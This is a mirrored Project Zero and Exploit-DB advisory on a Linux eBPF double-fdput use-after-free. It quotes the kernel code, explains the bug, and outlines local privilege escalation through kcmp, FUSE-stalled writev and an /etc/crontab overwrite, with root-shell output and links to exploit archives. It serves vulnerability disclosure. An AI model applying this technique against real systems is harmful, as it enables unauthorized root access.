A mirror of the content stored in 39772.txt obtained through exploit-db.com
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 | |
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the | |
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, | |
unprivileged code can use the bpf() syscall to load eBPF socket filter programs. | |
These conditions are fulfilled in Ubuntu 16.04. | |
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first | |
function that touches the supplied eBPF instructions is | |
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF | |
map file descriptors and looks up pointers for the corresponding map files. | |
This is done as follows: | |
/* look for pseudo eBPF instructions that access map FDs and | |
* replace them with actual map pointers | |
*/ | |
static int replace_map_fd_with_map_ptr(struct verifier_env *env) | |
{ | |
struct bpf_insn *insn = env->prog->insnsi; | |
int insn_cnt = env->prog->len; | |
int i, j; | |
for (i = 0; i < insn_cnt; i++, insn++) { | |
[checks for bad instructions] | |
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { | |
struct bpf_map *map; | |
struct fd f; | |
[checks for bad instructions] | |
f = fdget(insn->imm); | |
map = __bpf_map_get(f); | |
if (IS_ERR(map)) { | |
verbose("fd %d is not pointing to valid bpf_map\n", | |
insn->imm); | |
fdput(f); | |
return PTR_ERR(map); | |
} | |
[...] | |
} | |
} | |
[...] | |
} | |
__bpf_map_get contains the following code: | |
/* if error is returned, fd is released. | |
* On success caller should complete fd access with matching fdput() | |
*/ | |
struct bpf_map *__bpf_map_get(struct fd f) | |
{ | |
if (!f.file) | |
return ERR_PTR(-EBADF); | |
if (f.file->f_op != &bpf_map_fops) { | |
fdput(f); | |
return ERR_PTR(-EINVAL); | |
} | |
return f.file->private_data; | |
} | |
The problem is that when the caller supplies a file descriptor number referring | |
to a struct file that is not an eBPF map, both __bpf_map_get() and | |
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If | |
__fget_light() detected that the file descriptor table is shared with another | |
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause | |
the reference count of the struct file to be over-decremented, allowing an | |
attacker to create a use-after-free situation where a struct file is freed | |
although there are still references to it. | |
A simple proof of concept that causes oopses/crashes on a kernel compiled with | |
memory debugging options is attached as crasher.tar. | |
One way to exploit this issue is to create a writable file descriptor, start a | |
write operation on it, wait for the kernel to verify the file's writability, | |
then free the writable file and open a readonly file that is allocated in the | |
same place before the kernel writes into the freed file, allowing an attacker | |
to write data to a readonly file. By e.g. writing to /etc/crontab, root | |
privileges can then be obtained. | |
There are two problems with this approach: | |
The attacker should ideally be able to determine whether a newly allocated | |
struct file is located at the same address as the previously freed one. Linux | |
provides a syscall that performs exactly this comparison for the caller: | |
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd). | |
In order to make exploitation more reliable, the attacker should be able to | |
pause code execution in the kernel between the writability check of the target | |
file and the actual write operation. This can be done by abusing the writev() | |
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays | |
read accesses, then mmap()s a file containing a struct iovec from that FUSE | |
filesystem and passes the result of mmap() to writev(). (Another way to do this | |
would be to use the userfaultfd() syscall.) | |
writev() calls do_writev(), which looks up the struct file * corresponding to | |
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies | |
that the target file is writable, then calls do_readv_writev(), which first | |
copies the struct iovec from userspace using import_iovec(), then performs the | |
rest of the write operation. Because import_iovec() performs a userspace memory | |
access, it may have to wait for pages to be faulted in - and in this case, it | |
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, | |
allowing the attacker to suspend code execution in the kernel at that point | |
arbitrarily. | |
An exploit that puts all this together is in exploit.tar. Usage: | |
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh | |
user@host:~/ebpf_mapfd_doubleput$ ./doubleput | |
starting writev | |
woohoo, got pointer reuse | |
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. | |
suid file detected, launching rootshell... | |
we have root privs now... | |
root@host:~/ebpf_mapfd_doubleput# id | |
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user) | |
This exploit was tested on a Ubuntu 16.04 Desktop system. | |
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7 | |
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 | |
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment